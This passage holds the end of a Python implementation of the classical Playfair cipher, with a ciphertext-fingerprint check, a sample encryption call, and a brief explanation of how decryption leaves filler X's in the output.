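    """Fingerprint: only letters, even length, no J, and no digraph whose two
    letters are equal (the rules can never produce one)."""
    ct = ciphertext.upper()
    if len(ct) % 2 or not ct.isalpha() or "J" in ct:
        return False
    return all(ct[i] != ct[i + 1] for i in range(0, len(ct), 2))


if __name__ == "__main__":
    print(encrypt("Hide the gold in the tree stump", "playfair example"))
```

Decryption undoes rules 4 and 5 by stepping up/left instead of down/right, while rule 6 is its own inverse; the filler X's stay in the output (TREXES for "trees"), which is the "not very accurate" reading the page mentions and has to be cleaned up by hand.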
